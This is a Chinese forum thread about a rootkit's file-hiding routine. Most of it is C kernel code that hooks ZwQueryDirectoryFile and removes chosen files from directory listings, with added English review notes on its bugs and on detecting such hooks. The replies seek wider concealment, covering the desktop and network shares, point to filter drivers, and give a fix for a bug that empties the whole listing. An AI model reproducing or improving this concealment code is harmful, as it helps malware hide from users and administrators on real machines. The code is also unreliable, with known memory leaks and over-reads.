rootkit中隐藏文件的一个漏洞
typedef struct _FILETIME
{ DWORD dwLowDateTime; DWORD dwHighDateTime; } FILETIME; /* 64-bit timestamp split into two DWORDs */

/*
 * One record of a directory listing as laid out in the FileInformationBuffer
 * returned by ZwQueryDirectoryFile.  dwLenToNext is the byte offset of the
 * next record (0 marks the last one); suName is the first WCHAR of the
 * variable-length file name whose byte length is wNameLen -- the layout
 * itself does not NUL-terminate the name.
 * NOTE(review): the field order looks like FILE_BOTH_DIR_INFORMATION.  The
 * hook below never checks FileInfoClass, so a caller asking for any other
 * information class would still be walked with these offsets -- confirm
 * against the callers.
 */
typedef struct _DirEntry {
    DWORD dwLenToNext;
    DWORD dwAttr;
    FILETIME ftCreate, ftLastAccess, ftLastWrite;
    DWORD dwUnknown[ 2 ];
    DWORD dwFileSizeLow;
    DWORD dwFileSizeHigh;
    DWORD dwUnknown2[ 3 ];
    WORD wNameLen;
    WORD wUnknown;
    DWORD dwUnknown3;
    WORD wShortNameLen;
    WCHAR swShortName[ 12 ];
    WCHAR suName[ 1 ];
} DirEntry, *PDirEntry;

/* Per-thread record (apparently of a process-enumeration query); nothing in
 * this listing references it. */
struct _SYSTEM_THREADS {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientIs;
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    ULONG ThreadState;
    KWAIT_REASON WaitReason;
};

/*
 * Hide directories/files: replacement for ZwQueryDirectoryFile.
 * OldZwQueryDirectoryFile holds the original entry point and is called first
 * with every argument unchanged.  On success the returned buffer is edited in
 * place: each record whose upper-cased name begins with the name of a
 * list_head node flagged PTR_HIDEDIR is dropped -- by copying the rest of the
 * buffer over it (middle record), by zeroing the previous record's
 * dwLenToNext (last record), or by replacing the status with 0x80000006 when
 * the hidden record is the only one in the buffer.
 *
 * Defender's view: the on-disk directory is untouched and only the API result
 * is filtered, so a cross-view comparison (API enumeration against raw volume
 * reads) and an integrity check of the ZwQueryDirectoryFile dispatch entry are
 * the natural places to catch this kind of hook.
 *
 * Returns: the original call's status, or 0x80000006 (STATUS_NO_MORE_FILES,
 * as the reply on this page names it) when the single returned record was
 * hidden.  pIoStatusBlock->Information is never adjusted after compaction.
 *
 * Reviewer notes on the code as written (documented, not changed):
 *  - ansiFileName/ansiDirName are allocated (AllocateDestinationString=TRUE)
 *    on every loop pass but freed only once after the loop, so every pass
 *    except the last leaks its two allocations.
 *  - RtlInitUnicodeString(&uniFileName, p->suName) scans for a NUL; suName
 *    carries its length in wNameLen and is not terminated by the layout, so
 *    the scan can run past the record -- presumably relying on padding; verify.
 *  - RtlCompareMemory compares strlen(ptr->name) bytes regardless of
 *    ansiFileName.Length, so a name shorter than the list entry is over-read,
 *    and the test is a prefix match rather than an equality test.
 *  - iLeft is computed from FileInformationBufferLength rather than from the
 *    byte count the call actually returned, and the RtlCopyMemory source and
 *    destination overlap.
 *  - aProcessName, ParentDirectory, BytesReturned and Object are declared but
 *    never used in this listing.
 */
NTSTATUS HookZwQueryDirectoryFile(
    IN HANDLE hFile,
    IN HANDLE hEvent OPTIONAL,
    IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
    IN PVOID IoApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK pIoStatusBlock,
    OUT PVOID FileInformationBuffer,
    IN ULONG FileInformationBufferLength,
    IN FILE_INFORMATION_CLASS FileInfoClass,
    IN BOOLEAN bReturnOnlyOneEntry,
    IN PUNICODE_STRING PathMask OPTIONAL,
    IN BOOLEAN bRestartQuery)
{
    NTSTATUS rc;
    CHAR aProcessName[80];                 /* unused here */
    ANSI_STRING ansiFileName,ansiDirName;  /* per-record ANSI copies of the name (heap, see leak note above) */
    UNICODE_STRING uniFileName;
    PP_DIR ptr;                            /* cursor over the list_head linked list */
    WCHAR ParentDirectory[1024] = {0};     /* unused here */
    int BytesReturned;                     /* unused here */
    PVOID Object;                          /* unused here */

    /* Run the original ZwQueryDirectoryFile first; everything below only
     * post-processes its output. */
    rc = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile))(
        hFile, hEvent, IoApcRoutine, IoApcContext, pIoStatusBlock,
        FileInformationBuffer, FileInformationBufferLength, FileInfoClass,
        bReturnOnlyOneEntry, PathMask, bRestartQuery);

    if(NT_SUCCESS(rc)) {
        PDirEntry p;        /* record currently examined */
        PDirEntry pLast;    /* record preceding p, NULL for the first one */
        BOOL bLastOne;      /* p->dwLenToNext == 0, i.e. no record follows */
        int found;

        p = (PDirEntry)FileInformationBuffer; /* overlay the record layout on the returned buffer */
        pLast = NULL;
        do {
            bLastOne = !( p->dwLenToNext );

            /* Build an upper-cased ANSI copy of the record's name.  Both ANSI
             * strings come from the same Unicode name; RtlUpperString writes
             * the upper-cased ansiDirName into ansiFileName. */
            RtlInitUnicodeString(&uniFileName,p->suName);
            RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);
            RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);
            RtlUpperString(&ansiFileName,&ansiDirName);

            found=0;
            /* Does the hide list contain this name?  Only PTR_HIDEDIR nodes
             * count; the comparison is a byte-prefix match against
             * ptr->name (presumably stored upper-cased -- verify). */
            for(ptr = list_head; ptr != NULL; ptr = ptr->next) {
                if (ptr->flag != PTR_HIDEDIR) continue;
                if( RtlCompareMemory( ansiFileName.Buffer, ptr->name,strlen(ptr->name) ) == strlen(ptr->name)) {
                    found=1;
                    break;
                }
            }//end for

            /* The name is on the list: remove this record from the buffer. */
            if(found) {
                if(bLastOne) {
                    if(p == (PDirEntry)FileInformationBuffer ) {
                        /* Author's note (translated): this branch is meant for
                         * the case where there is only one file.  But for a
                         * volume or directory with several files, when the
                         * file to hide happens to be the first one returned,
                         * its dwLenToNext is also 0, so bLastOne is TRUE and
                         * 0x80000006 (NO-MORE-FILES) is returned -- the other
                         * files can no longer be shown and the whole volume's
                         * listing disappears.  Ideas on how to handle this are
                         * welcome.
                         * NOTE(review): that single-record situation is what a
                         * caller gets when it asks for one entry at a time
                         * (bReturnOnlyOneEntry) -- presumably the trigger; verify. */
                        rc = 0x80000006;
                    }
                    else pLast->dwLenToNext = 0; /* previous record becomes the last one */
                    break;
                } else {
                    /* Middle record: slide the remainder of the buffer down over
                     * it.  iLeft is measured against the buffer capacity, not
                     * the bytes actually filled, and the two regions overlap
                     * (see reviewer notes above). */
                    int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;
                    int iLeft = (DWORD)FileInformationBufferLength - iPos - p->dwLenToNext;
                    RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft );
                    /* 'continue' jumps to the while() test; bLastOne is FALSE
                     * here, so the same p -- now holding the moved-down record --
                     * is examined again on the next pass. */
                    continue;
                }
            }
            pLast = p;
            p = (PDirEntry)((char *)p + p->dwLenToNext );
        }while( !bLastOne );

        /* Only the strings from the final pass are released (see leak note). */
        RtlFreeAnsiString(&ansiDirName);
        RtlFreeAnsiString(&ansiFileName);
    }
    return(rc);
}
沙发#
发布于:2004-11-25 11:00
另外,这种方法若在开机后加载驱动,就无法隐藏桌面上的东西;对共享的文件夹只能实现本地隐藏,网络上的其它机器仍能看到,如何把这些情况全部隐藏?
大家多多出招!!!!!! |
板凳#
发布于:2004-11-25 13:28
建议采用FSD FILTER来做,HOOK NATIVE API功能实在有限.
地板#
发布于:2004-11-25 20:53
楼上兄弟,哪里有FSD FILTER的资料,介绍一下,我没接触过这方面的东西,谢谢!!!!!!!!!!
地下室#
发布于:2004-12-25 01:47
我刚好在看这些代码,也发现了这个问题,开始觉得挺奇怪,后来用softice才找到原因。
解决方法也很简单,将rc = STATUS_NO_MORE_FILES那句替换成以下即可: RtlZeroMemory(FileInformationBuffer, FileInformationBufferLength); 我的测试通过了,你可以试试看。